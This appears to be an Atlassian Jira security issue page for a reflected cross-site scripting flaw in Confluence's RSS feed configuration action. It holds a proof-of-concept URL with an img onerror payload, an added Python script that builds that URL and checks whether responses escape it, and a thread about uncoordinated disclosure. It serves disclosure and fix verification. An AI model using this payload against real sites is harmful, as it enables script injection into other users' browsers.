Details

    • Last commented by user?:
      true
    • CVSS Score:
      7.5

      Description

      Filed by Vitaly Osipov [Atlassian] on behalf of Muhammad Waqar.

      http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed

      Works in Firefox.
      Note: the title and labelString parameters need encoding.
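      The proof of concept above depends on the title and labelString values being percent-encoded, and verifying a fix means checking whether the server echoes those values back raw or entity-escaped. The script below is an added example, not code from the reporter or from Atlassian: it rebuilds the report's URL with correct encoding (the hostname is a placeholder), decodes it again to confirm both parameters carry the payload, and classifies a response body as reflecting the payload raw, escaped, or not at all. The two response bodies are constructed to illustrate the vulnerable and fixed outcomes and were not captured from a real Confluence instance.

```python
"""Build the encoded proof-of-concept URL from the report and classify whether
a response reflects the payload unescaped.

This is an added example, not the reporter's or Atlassian's code.  The
hostname is a placeholder, and the two response bodies are constructed
to show the vulnerable and fixed outcomes; nothing here is captured
from a real Confluence instance.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# The payload from the report, in its decoded form.
PAYLOAD = '#"><img src=x onerror=prompt(1);>'


def build_poc_url(hostname, payload=PAYLOAD, scheme="http"):
    """Return the doconfigurerssfeed.action URL with every parameter
    percent-encoded.  The report notes that title and labelString need
    encoding; passing a list of tuples keeps the repeated types/*SubTypes
    keys in the same order as the original URL."""
    params = [
        ("types", "page"),
        ("pageSubTypes", "comment"),
        ("pageSubTypes", "attachment"),
        ("types", "blogpost"),
        ("blogpostSubTypes", "comment"),
        ("blogpostSubTypes", "attachment"),
        ("types", "mail"),
        ("spaces", "conf_all"),
        ("title", payload),
        ("labelString", payload),
        ("excludedSpaceKeys", ""),
        ("sort", "modified"),
        ("maxResults", "11"),
        ("timeSpan", "5"),
        ("showContent", "true"),
        ("showDiff", "true"),
        ("confirm", "Create RSS Feed"),
    ]
    path = "/dashboard/doconfigurerssfeed.action"
    return f"{scheme}://{hostname}{path}?{urlencode(params)}"


def injected_params(url, payload=PAYLOAD):
    """Decode the query string and return the names of the parameters
    that carry the payload, confirming the encoding round-trips."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(name for name, values in query.items() if payload in values)


def classify_reflection(body, payload=PAYLOAD):
    """Classify how a response body reflects the payload:
    'raw'     - the markup appears verbatim, so the browser will run it
    'escaped' - it appears only in HTML-entity-encoded form (the fix)
    'absent'  - it is not reflected at all
    Unescaping the body first makes the check independent of whether the
    server emits &quot; or &#34; for a double quote."""
    if payload in body:
        return "raw"
    if payload in html.unescape(body):
        return "escaped"
    return "absent"


# Constructed responses (not real Confluence output).  Both echo the
# title parameter back into a form field; only the first breaks out of
# the attribute and yields a live <img onerror> element.
VULNERABLE_BODY = (
    '<input type="text" name="title" value="#"><img src=x onerror=prompt(1);>">'
)
FIXED_BODY = (
    '<input type="text" name="title" '
    'value="#&quot;&gt;&lt;img src=x onerror=prompt(1);&gt;">'
)


if __name__ == "__main__":
    url = build_poc_url("confluence.example.invalid")
    print(url)
    print("injected:", injected_params(url))
    for label, body in (("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY)):
        print(label, "->", classify_reflection(body))
```

      Against a live instance, fetch the built URL with a session cookie and pass the response text to classify_reflection; a result of "raw" for either parameter means the fix is not in place, while "escaped" is what a correctly HTML-encoded form field produces.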

        Issue Links

          Activity

          Vitaly Osipov [Atlassian] added a comment -

          Note: Muhammad Waqar published this advisory without coordinating with us: http://packetstormsecurity.com/files/122717/Atlassian-Confluence-5.3-Cross-Site-Scripting.html

          Muhammad Waqar added a comment -

          This is because I received a notification that the bug has been fixed.

          Vitaly Osipov [Atlassian] added a comment -

          Muhammad Waqar, from where did you receive this notification? This issue is still open, as you can see.

          Muhammad Waqar added a comment -

          Yes, I can see. I had received it via email, the same as the other notifications are arriving.

          Vitaly Osipov [Atlassian] added a comment -

          Muhammad Waqar, this is interesting: according to the history tab, the state of this issue has never changed to resolved: https://jira.atlassian.com/browse/CONF-30240?page=com.atlassian.streams.streams-jira-plugin:activity-stream-issue-tab

          Regardless of that, do you think that publishing an advisory without any coordination with the vendor is a good disclosure policy?

          Muhammad Waqar added a comment -

          Greetings Osipov,
          At first look I thought the issue might be fixed, and so that resulted in the disclosure. I realize now that it might have been tested then.
          I will make sure that this won't happen again. Sorry for the inconvenience.
          Have a good day!
          Regards,
          Muhammad Waqar

          David Black [Atlassian] added a comment -

          I have QA'ed remotes/origin/confluence-project-5.2-stable as being fixed.


            People

            • Votes:
              0
            • Watchers:
              7

            Dates

            • Created:
            • Updated:
            • Resolved:
            • Last commented:
              35 weeks, 2 days ago